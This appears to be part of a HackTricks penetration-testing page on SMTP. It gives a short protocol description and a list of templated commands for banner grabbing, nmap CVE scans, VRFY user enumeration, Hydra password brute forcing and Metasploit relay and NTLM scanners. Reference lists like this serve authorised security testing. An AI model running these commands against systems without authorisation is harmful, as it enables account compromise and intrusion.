Note: |
|
|
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.
|
|
|
|
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html
|
|
|
|
Entry_2:
|
|
Name: Banner Grab
|
|
Description: Grab SMTP Banner
|
|
Command: nc -vn {IP} 25
|
|
|
|
Entry_3:
|
|
Name: SMTP Vuln Scan
|
|
Description: SMTP Vuln Scan With Nmap
|
|
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}
|
|
|
|
Entry_4:
|
|
Name: SMTP User Enum
|
|
Description: Enumerate uses with smtp-user-enum
|
|
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}
|
|
|
|
Entry_5:
|
|
Name: SMTPS Connect
|
|
Description: Attempt to connect to SMTPS two different ways
|
|
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587
|
|
|
|
Entry_6:
|
|
Name: Find MX Servers
|
|
Description: Find MX servers of an organization
|
|
Command: dig +short mx {Domain_Name}
|
|
|
|
Entry_7:
|
|
Name: Hydra Brute Force
|
|
Description: Need Nothing
|
|
Command: hydra -P {Big_Passwordlist} {IP} smtp -V
|
|
|
|
Entry_8:
|
|
Name: consolesless mfs enumeration
|
|
Description: SMTP enumeration without the need to run msfconsole
|
|
Note: sourced from https://github.com/carlospolop/legion
|
|
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'
|
|
|
|
```
|
|
{{#include ../../banners/hacktricks-training.md}}
|